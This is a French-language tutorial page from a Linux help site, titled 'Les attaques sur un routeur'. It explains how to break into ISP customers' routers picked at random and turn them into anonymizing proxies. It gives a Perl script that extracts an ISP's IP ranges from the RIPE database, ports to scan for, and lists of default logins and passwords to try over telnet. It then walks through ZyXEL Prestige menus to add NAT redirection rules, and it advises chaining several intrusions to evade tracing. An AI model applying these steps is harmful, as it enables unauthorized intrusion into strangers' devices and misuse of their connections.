Chrooter apache
Matériel
Ajout disque dur
Ajout carte
Audit des disques durs
Gestion des peripheriques
Disquette d'installation
Ajout d'un scanner
Graver en ligne de commande
Astuces
Ajout d'une imprimante
Réseau
Configuration reseau
Dns
Serveur cvs
Proxy squid 
Installation serveur ftp
Installation qmail 
Installation serveur courrier sous debian
Outil TCP/IP 
Le serveur samba
Connexion a distance securisee
Client/serveur vnc
Configurer apache
Dyndns
Sécurité
Chiffrer un fichier/dossier
Securiser son poste
Mur pare feu pas a pas
Authentification ht-access
Surveillance de serveur CACTI
Snort
Snort-inline
Securiser Apache avec mod_security
Filtrage squid/squidguard/dansguardian
Auditer son site web
Sécuriser son linux
Installer un Lamp avec ssl
Contrer les scans de ports
Traitement anti-spam
Installer/Utiliser tripwire
Faire des sauvegardes incrémentales
Divers
Elisa, le multimédia facile
Utilisation de lilo
Les commandes Linux
Le multi-tache
Le crontab
Exploration de la configuration
Quotas
Messagerie
Installer une application
Debugger ses applications
Le format RPM
Mise a jour du noyau
Qemu
Tour d'horizon des principaux p2p
Récupération du système
Bips d'un pc
Astuces windows
Table Ascii
Lamerland
Conversion de fichiers musicaux
Compiler ses rpms
Liens
hakin9
Secureroot.com
Hackerthreads.org
Defcon
Hackerlounge
Les derniers exploits
Tous les codes sources
Securite sous Linux
Les logiciels libres quotidiens
Ezine divers
Madchat
Textes divers
Archives
 
Traductions LG
Toutes les traductions
Traductions Phrack
Toutes les traductions

Il y a actuellement 4 visiteurs connectés sur le site !

Google

Les attaques sur un routeur
Les attaques sur un routeur

 

Introduction
Choisir ses IPs : le script
Scan applicatif du modem
Intrusion
Mise en oeuvre

 

Introduction

De plus en plus d'ordinateurs utilisent des modems-routeur pour se connecter à Internet Le but de cet article est de s'introduire dans un routeur scanné au hasard. On procédera ensuite à une redirection à l'aide de règles NAT (NAT permet de rediriger des ports entrants vers des IPs internes ou externes). Cette technique permet d"implémenter un proxy entre vous et le site visité, et ce faisant de garantir un certain anonymat (sachant que le fai possède les logs du routeur et peut remonter jusqu'à vous, il sera prudent d'enchaîner plusieurs intrusions de ce genre).


 

Choisir ses IPs : le script

Pour trouver toutes les IPs d'un fournisseur d'accès on utilise la base de données ripe qui se trouve ICI :
wget ftp://ftp.ripe.net/ripe/dbase/split/ripe.db.inetnum.gz
Une fois l'archive teléchargée et décompressée à l'aide de la commande
gunzip ripe.db.inetnum.gz
vous obtenez un fichier ripe.db.inetnum que vous nommerez ripe.db
Ensuite vous copierez ce script dans le même répertoire que ripe.db:

#!/usr/bin/perl

use strict;
use Socket;

die "Usage: $0 \nExemple : $0 wanadoo\n" if (!@ARGV);
my $regexp = shift;
open(RIPE, "ripe.db") || die "Can't open ripe.db : $!\n";
my $line;

my ($ip_start, $ip_end);
my (@inetnum, @sort);

while () {
chomp;
if (/^inetnum:/) {
$line = "$_\n";
} else {
$line .= "$_\n" if ($line);
}
if (/^$/ && $line) {
if ($line =~ /$regexp/) {
$line =~ /^inetnum:\s+(\d+)\.(\d+)\.(\d+)\.(\d+)\s+-\s+(\d+)\.(\d+)\.(\d+)\.(\d+)/;

$ip_start = hex sprintf "%02x%02x%02x%02x", $1, $2, $3, $4;
$ip_end = hex sprintf "%02x%02x%02x%02x", $5, $6, $7, $8;

push(@inetnum, [$ip_start, $ip_end]);
$line = "";
}
}
}
close(RIPE);

@inetnum = sort {$a->[0] <=> $b->[0] || $a->[1] <=> $b->[1]} @inetnum;

push(@sort, @inetnum[0]);
for (my $i = 1; $i <= $#inetnum; $i++) {
if ( $inetnum[$i]->[0] <= $sort[$#sort]->[1]+1 ) {
$sort[$#sort]->[1] = $inetnum[$i]->[1] if ($inetnum[$i]->[1] > $sort[$#sort]->[1]);
} else {
push(@sort, @inetnum[$i]);
}
}
@inetnum = @sort;

my ($total, $addr, $ip);

for my $range (@inetnum) {
$total += $range->[1] - $range->[0] +1;
$addr = reverse(pack("L", $range->[0]));
$ip = inet_ntoa($addr);
print "$ip - ";
$addr = reverse(pack("L", $range->[1]));
$ip = inet_ntoa($addr);
print "$ip\n";
} print STDERR "# $regexp\n# Total = $total IPv4\n";

Il suffit à présent de l'utiliser avec les commandes :

chmod +x ripe.pl (pour le rendre exécutable)

./ripe.pl numericable.fr >> numericable.fr.txt

Ces lignes exécutent le script perl avec en paramètre le fai numéricable et le résultat est placé dans le fichier texte numericable.fr.txt


 

Scan applicatif du modem

Puisque vous possédez les plages ips, il suffit maintenant de les scanner à l'aide d'un scanner de type nmap ou bien
http://www.clubic.com/telecharger-fiche10828-superscan.html
Il s'agit à présent de rechercher les ports ouverts sur ces modems ,vous pouvez trouver dans google de multiples adresses de scanner de type applicatifs (retina etc...) qui rechercheront avec une ip les ports ouverts .
Voici la liste des ports les plus intéressants: 


   * 20 File Transfert Protocol
   * 21 File Transfert Protocol
   * 23 telnet 
   * 69 TFP Trivial File Transfert Protocol
   * 80 HTTP
   * 8080 Standard HTTP Proxy

 

Intrusion

Pour accéder aux ports ouverts sur ce modem, par exemple le port 23 de l'ip 80.57.x.x saisir en console :
telnet 81.56.x.x
Il vous sera alors demandé un mot de passe que malheureusement les utilisateurs prennent l'habitude de laisser par défaut (ne pas oublier alors de se rendre sur l'interface de votre modem est de changer ce mot de passe , dès la première utilisation)
Voici une liste de login les plus courant :

"tech" "debug" "adm" "admin" "root" "monitor" "sysadm"
"install" "Manager" "User" "security" "system" "Cisco" "administrator"
"guest" "anonymous" "boss" "manager" "software" "DEFAULT" "accounting"
"FIELD" "demo" "HELP" "HELPDESK" "PRIV" "REPORT" "STUDENT"
"SYS" "SYSMAINT" "SYSTEST" "TEST" "BATCH" "Sysop" "username"
"n.a" "HELLO" "MAIL" "MGR" "PROG" "ibm" "!root"
"administrator"

et une liste de mot de passe approprié

"1234" "admin" "root" "Guest" "MASTER" "test" "password" "control" "SYS1" "IBM" "service" "router" "zebra" "blablabla" "netopia" "secure" "setup" "0000" "0" "manager" "SYSADM" "superuser" "sysadmin" "operator" "pass" "sys" "web" "webmaster" "Cisco" "attack" "secret" "rootme" /td>


 

Mise en oeuvre

À présent, nous allons essayer de tenter une redirection en entrant des données dans la configuration NAT d'un routeur pour lui faire rediriger tout ce qui vient sur un port vers une IP externe ou interne(lan). Sachez qu'il est tout à fait possible que le modem-routeur posséde un fichier de log de vos actions et il sera facile alors de remonter à votre IP à moins que vous ayez pris soin de vous connecter depuis un autre routeur

Vous avez donc scanné une plage ip et l'adresse ip 80.XX.XX.XX fonctionne :
telnet 80.xx.xx.xx
demande un mot de passe
Password:
je saisis password
et je suis sur l'interface du modem
Je choisis alors

Copyright (c) 1994 - 2003 ZyXEL Communications Corp.

Prestige 652H/HW-31 Main Menu

Getting Started Advanced Management
1. General Setup 21. Filter and Firewall Setup
2. WAN Backup Setup 22. SNMP Configuration
3. LAN Setup 23. System Security
4. Internet Access Setup 24. System Maintenance
5. DMZ Setup 25. IP Routing Policy Setup
Advanced Applications 26. Schedule Setup
11. Remote Node Setup 27. VPN/IPSec Setup
12. Static Routing Setup
14. Dial-in User Setup 99. Exit
15. NAT Setup

Enter Menu Selection Number:

Pour faire notre relaying je tape 15 et un petit enter et je vois :

Menu 15 - NAT Setup

1. Address Mapping Sets
2. NAT Server Sets

Enter Menu Selection Number:

je tape alors 2 ensuite enter et je vois :

Menu 15.2 - NAT Server Sets

1. Server Set 1 (Used for SUA Only)
2. Server Set 2
3. Server Set 3
4. Server Set 4
5. Server Set 5
6. Server Set 6
7. Server Set 7
8. Server Set 8
9. Server Set 9
10. Server Set 10
Enter Set Number to Edit:

je tape 1 enter:

Menu 15.2 - NAT Server Setup

Rule Start Port No. End Port No. IP Address
---------------------------------------------------
1. Default Default 0.0.0.0
2. 0 0 0.0.0.0
3. 0 0 0.0.0.0
4. 0 0 0.0.0.0
5. 0 0 0.0.0.0
6. 0 0 0.0.0.0
7. 0 0 0.0.0.0
8. 0 0 0.0.0.0
9. 0 0 0.0.0.0
10. 0 0 0.0.0.0
11. 0 0 0.0.0.0
12. 0 0 0.0.0.0
Press ENTER to Confirm or ESC to Cancel:

Ici on choisit le point 2 et en dessous du premier default on met 80 ainsi que pour le deuxième et pour l'ip on met celle du site à visiter
saisir enter pour arriver au bas de la page et Press ENTER to Confirm or ESC to Cancel: j'appuie sur ENTER pour valider la config en suite je saisis 99 a tout les Press ENTER to Confirm or ESC to Cancel: pour quiter et se déconnecter du routeur.
Quand vous lancer votre navigateur sur 80.xx.xx.xx , vous accédez au site demandé depuis le routeur!


Sources de l'article

 
Forum
Forum d'entraide
Blog
Le blog
News
Les news du site
Php/Mysql
Formulaire en php
Administrer un serveur Mysql
Session en php
Gerer ses bases mysql
Les bases php
Securiser ses scripts PHP
Controler ses programmes avec RATS
Convertir une base sql en utf8
Astuces php
Programmation
Python rapide
Tutorial Python
Tutorial Perl
Tutorial Perl complet
Tutoriel ruby
Tutoriel C
Introduction à gawk
Filtres et utilitaires
Find
Programmation Shell
Ecriture de scripts bash
Expressions regulieres
Vi
Introduction a Javascript
Compiler avec gcc
Astuces en Bash
Cracking
Tutoriel Assembleur
Guide du cracking pour débutant
Assembleur
Manual Unpacking
Techniques de Protection
Différentes failles Web
Arp spoofing dans un réseau switché
Les intrusions
Les attaques externes
Defacage
Defacage complet
Buffer overflow
Netcat
Injection sql
Injection sql(suite)
John the Ripper
Spoofer un email
Utiliser google
La faille system
Usurper une identité
Le rooting
Shellcode sous Unix
La faille race condition
La faille xss
La faille xss (2)
Attaques sur un routeur
P2P
Azureus pas-a-pas
News
Lire les news de Linux-pour-lesnuls.com au format RSS
Distros
Gestion des paquets debian
101 commandes debian
Graphisme
Effet neon dans GIMP
Effet vapeur dans GIMP
Cours fonctionnalités de GIMP
Humour
Ensemble
Divers